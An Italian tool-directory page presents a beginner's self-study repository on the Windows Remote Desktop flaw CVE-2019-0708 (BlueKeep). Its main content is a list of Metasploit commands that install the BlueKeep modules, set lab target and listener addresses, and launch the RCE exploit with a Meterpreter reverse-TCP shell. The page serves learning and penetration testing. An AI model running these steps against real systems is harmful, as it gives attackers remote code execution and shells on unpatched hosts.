Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-0708-Windows — Questo articolo condividerà la vulnerabilità del servizio desktop remoto di Windows (CVE-2019-0708) e spiegherà in dettaglio la vulnerabilità e le misure difensive. L'autore, essendo un principiante della sicurezza informatica, condivide alcuni tutorial di base per l'autoapprendimento, principalmente note online sugli strumenti di sicurezza e le operazioni pratiche. Spero che vi piacciano. Inoltre, spero che possiate operare e progredire insieme a me. In futuro, approfondirò la conoscenza della sicurezza informatica e della sicurezza di sistema e condividerò esperimenti correlati. In sintesi, spero che questa serie di articoli possa essere utile ai colleghi blogger. Scrivere articoli non è facile, i grandi esperti, per favore non criticate se non vi piacciono. Grazie! | Kitploit
Strumenti/GitHubGitHub/eastmountyxz/cve-2019-0708-windows
Analisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneSviluppo PayloadLab e Pratica
GitHubeastmountyxz/cve-2019-0708-windows

CVE-2019-0708-Windows

Vedi Repository
52106 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Questo articolo condividerà la vulnerabilità del servizio desktop remoto di Windows (CVE-2019-0708) e spiegherà in dettaglio la vulnerabilità e le misure difensive. L'autore, essendo un principiante della sicurezza informatica, condivide alcuni tutorial di base per l'autoapprendimento, principalmente note online sugli strumenti di sicurezza e le operazioni pratiche. Spero che vi piacciano. Inoltre, spero che possiate operare e progredire insieme a me. In futuro, approfondirò la conoscenza della sicurezza informatica e della sicurezza di sistema e condividerò esperimenti correlati. In sintesi, spero che questa serie di articoli possa essere utile ai colleghi blogger. Scrivere articoli non è facile, i grandi esperti, per favore non criticate se non vi piacciono. Grazie!

Condividi

CVE-2019-0708-Windows

Questo articolo condivide la vulnerabilità del servizio Desktop remoto di Windows (CVE-2019-0708) e spiega nel dettaglio la vulnerabilità e le misure difensive. L'autore, un principiante della sicurezza informatica, condivide alcuni tutorial di autoapprendimento di base, principalmente appunti online su strumenti di sicurezza e operazioni pratiche. Spero che vi piacciano. Inoltre, spero che possiate operare e progredire insieme a me. In futuro, approfondirò la conoscenza della sicurezza di rete e di sistema e condividerò esperimenti correlati. In sintesi, spero che questa serie di articoli possa essere utile ai lettori. Scrivere non è facile, esperti si astengano dal criticare, grazie!


Blog correlati:
[网络安全自学篇] 五十八.Windows漏洞利用之再看CVE-2019-0708及Metasploit反弹shell
[网络安全自学篇] 四十四.Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解


Comandi principali:

root@kitploit:~
# Copia file
cp ./rdp/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

# Avvia strumento
msfconsole
reload_all
search 0708

# Usa script
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

# Mostra informazioni
show options
show targets
info

# Imposta indirizzo di ascolto, indirizzo target, payload di reverse shell, tipo target
set rhosts 192.168.44.132
set lhost 192.168.44.129
set rdp_client_ip 192.168.44.129
set payload windows/x64/meterpreter/reverse_tcp
unset RDP_CLIENT_NAME
set target 3

# Esegui script
run
exploit

# Imposta larghezza di banda
Set GROOMSIZE 40

Riferimenti:
[1] https://github.com/rapid7/metasploit-framework/pull/12283?from=groupmessage&isappinstalled=0
[2] https://github.com/n1xbyte/CVE-2019-0708

Scarica lo strumento